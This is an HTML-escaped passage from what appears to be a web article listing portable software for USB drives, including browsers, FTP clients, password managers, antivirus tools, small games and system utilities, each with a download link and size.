margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Firefox [&lt;a href="http://portableapps.com/apps/internet/firefox_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable firefox"&gt;Win&lt;/a&gt;&amp;nbsp;(5.8 mb),&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/firefox/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Mac&lt;/a&gt;&amp;nbsp;(21.9mb),&amp;nbsp;&lt;a href="http://www.theplaceforitall.com/portablefirefox/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Cross-platform&lt;/a&gt;&amp;nbsp;(Win, Mac) ]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Other browsers:&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/camino/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Camino&lt;/a&gt;&amp;nbsp;[Mac, 16.2mb],&amp;nbsp;&lt;a href="http://www.opera-usb.com/operausben.htm" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable Opera"&gt;Opera&lt;/a&gt;&amp;nbsp;[Win],&amp;nbsp;&lt;a href="http://osxportableapps.sourceforge.net/p_safari/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable Safari"&gt;Safari&lt;/a&gt;&amp;nbsp;[Mac] – requires installed safari&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Feedreaders (RSS, Atom …):&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/rssowl/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;RSSOwl&lt;/a&gt;&amp;nbsp;[Mac, 5mb],&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/feed/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Feed&lt;/a&gt;&amp;nbsp;[Mac, 564kb],&amp;nbsp;&lt;a href="http://www.snapfiles.com/get/greatnews.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;GreatNews&lt;/a&gt;&amp;nbsp;[Win],&amp;nbsp;&lt;a href="http://portableapps.com/apps/internet/sage_extension" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable rss reader"&gt;Sage&lt;/a&gt;&amp;nbsp;[Win, 0.2 mb]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;FTP Clients:&amp;nbsp;&lt;a href="http://portableapps.com/apps/internet/filezilla_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable FTP client"&gt;Filezilla&lt;/a&gt;&amp;nbsp;[Win, 2.3 mb],&amp;nbsp;&lt;a href="http://portableapps.com/apps/internet/fireftp_extension" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;FireFTP&lt;/a&gt;&amp;nbsp;[Win, 0.1mb],&amp;nbsp;&lt;a href="http://www.freesmug.org/portableapps/cyberduck/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;CyberDuck&lt;/a&gt;&amp;nbsp;[Mac, 9.9mb]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/trayurl.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;TrayURL&lt;/a&gt;&amp;nbsp;[Win] – bookmark manager&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.utorrent.com/download.php" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable torrent client"&gt;uTorrent&lt;/a&gt;&amp;nbsp;[Win] – popular torrent downloader&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Security Software&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Antivirus:&amp;nbsp;&lt;a href="http://portableapps.com/apps/utilities/keepass_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="password storage"&gt;ClamWin&lt;/a&gt;&amp;nbsp;[Win, 5.9mb],&amp;nbsp;&lt;a href="http://www.snapfiles.com/get/cureit.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable antivirus"&gt;Dr.Web CureIt&lt;/a&gt;&amp;nbsp;[Win, 5.5 mb]&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://portableapps.com/apps/utilities/keepass_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="password collector"&gt;Keepass Password&lt;/a&gt;&amp;nbsp;[Win, 1mb] – securely store and manage your passwords&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/omziff.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Omziff&lt;/a&gt;&amp;nbsp;[Win, 0.5mb] – lets you encrypt/decrypt a file, using secure encryption algorithms. Also includes a password generator, file shredder, file splitter and some more tools.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="https://www.steganos.com/?content=locknote&amp;amp;language=en" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;LockNote&lt;/a&gt;&amp;nbsp;[Win] – simple text file that lets you store sensitive info with 256bit password encryption.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/pass2go.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable password manager"&gt;RoboFor2Go&lt;/a&gt;&amp;nbsp;[Win] – secure password manager and form filler&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/smartsniff.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Smart Sniff&lt;/a&gt;&amp;nbsp;[Win, 57kb] – lets you inspect network traffic that passes via your network adapter.&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Portable Games&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://portableapps.com/apps/games/sudoku_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable games"&gt;Sudoku&lt;/a&gt;&amp;nbsp;– popular puzzle game&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.doob.de/Bricks2000" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable tetris game"&gt;Bricks2000&lt;/a&gt;&amp;nbsp;– popular tetris clone&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://stuff.goatdairying.com/programs/games/games.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Logix&lt;/a&gt;&amp;nbsp;– something similar to minesweeper&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://generally.cjb.net/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable USB game"&gt;GeneRally&lt;/a&gt;&amp;nbsp;– 2D racing game&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.mayothi.com/nagaskaki.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Nagaskaki&lt;/a&gt;&amp;nbsp;– chess game&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.cylog.org/games_4.asp" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;NarkoMania&lt;/a&gt;&amp;nbsp;– cool minesweeper clone&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://icculus.org/neverball/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;NeverBall&lt;/a&gt;&amp;nbsp;– part puzzle, part action game&lt;/li&gt;
&lt;/ul&gt;&lt;div style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #4088b8; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Other Portable Utilities&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="color: #333333; font-family: Arial, Helvetica; font-size: 12px; line-height: 21px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://portableapps.com/apps/utilities/7-zip_portable" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable archive utility"&gt;7Zip&lt;/a&gt;&amp;nbsp;[Win, 1.1 mb] – file archiver and compressor, supports 7z, ZIP, GZIP, BZIP2, TAR, RAR and more&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://mikicun.blogsome.com/2007/04/03/registry-tweaker-v212280-thinstalled/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Registry Tweaker&lt;/a&gt;&amp;nbsp;[Win, 1.52mb] – registry tweaking tool&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/reviews/Restoration/restoration.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable file recovery tool"&gt;Restoration&lt;/a&gt;&amp;nbsp;[Win, 229kb] – handy program for recovering deleted (or formatted) files&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/yamipod.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="standalone ipod manager"&gt;YamiPod&lt;/a&gt;&amp;nbsp;[Win] – powerful iPod manager (copy mp3/AAC files to and from your iPod, import/export playlists, search for songs, remove duplicates,..). More&amp;nbsp;&lt;a href="http://www.makeuseof.com/tag/15-ways-to-tools-your-ipod-better/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;iPod tools&lt;/a&gt;&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/andrivemanager.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Drive Manager&lt;/a&gt;&amp;nbsp;[Win, 1191 kb] – quick summary for each local and removable drive.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.pegtop.net/start/" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;PStart&lt;/a&gt;&amp;nbsp;– lets you organize and create menu-like list for quicker access to your portable programs.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://osxportableapps.sourceforge.net/syncpappx/index.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;SyncPAppX&lt;/a&gt;&amp;nbsp;– script that syncs preferences between portable and local applications.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.portablefreeware.com/?id=1270" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;RQ Money&lt;/a&gt;&amp;nbsp;– handy utlity to manage your credits and debts&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.gtopala.com/siw-download.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;SIW&lt;/a&gt;&amp;nbsp;– a system analysis tool that tells you almost everything you need to know about a computer, i.e. hardware, configuration settings, etc.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.pxserver.com/WinAudit.htm" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;WinAudit&lt;/a&gt;&amp;nbsp;– one more analysis tool&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/convert.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank" title="portable unit converter"&gt;Convert&lt;/a&gt;&amp;nbsp;[Win, 155 kb] – fast metric unit conversion tool (distance, temperature, volume, time, speed, mass…)&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/kalender.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;UK Calender&lt;/a&gt;&amp;nbsp;[Win, 321kb] – straightforward calendar with ToDo and reminders&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.cpuid.com/cpuz.php" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;CPU-Z&lt;/a&gt;&amp;nbsp;[Win] – provides detailed info about your processor and other components&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/ccodes.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Country Codes&lt;/a&gt;&amp;nbsp;[Win, 1358 kb] – a small database of country codes and additional information for all countries.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/treepad.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;TreePad Lite&lt;/a&gt;&amp;nbsp;[Win, 866kb] – personal database program, lets you store all your notes, emails, bookmarks, etc. into one well-structured file&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/startuplist.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;StartupList&lt;/a&gt;&amp;nbsp;[Win, 158 kb] – displays all items that are in any way related to your computer startup and are executed without any user interactions&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.snapfiles.com/get/extextreader.html" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;eTextReader&lt;/a&gt;&amp;nbsp;[Win, 279kb] – read plain text files provided by Project Gutenberg in a book-like manner.&lt;/li&gt;
&lt;li style="list-style-image: initial; list-style-position: initial; list-style-type: square; margin-bottom: 0px; margin-left: 30px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://www.portablefreeware.com/?id=1177" style="color: #3c78a7; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;" target="_blank"&gt;Index Your Files&lt;/a&gt;&amp;nbsp;[Win, 640kb] – provides an easy way to create index databases (of specified folders and drives) for quick file/term search&lt;/li&gt;
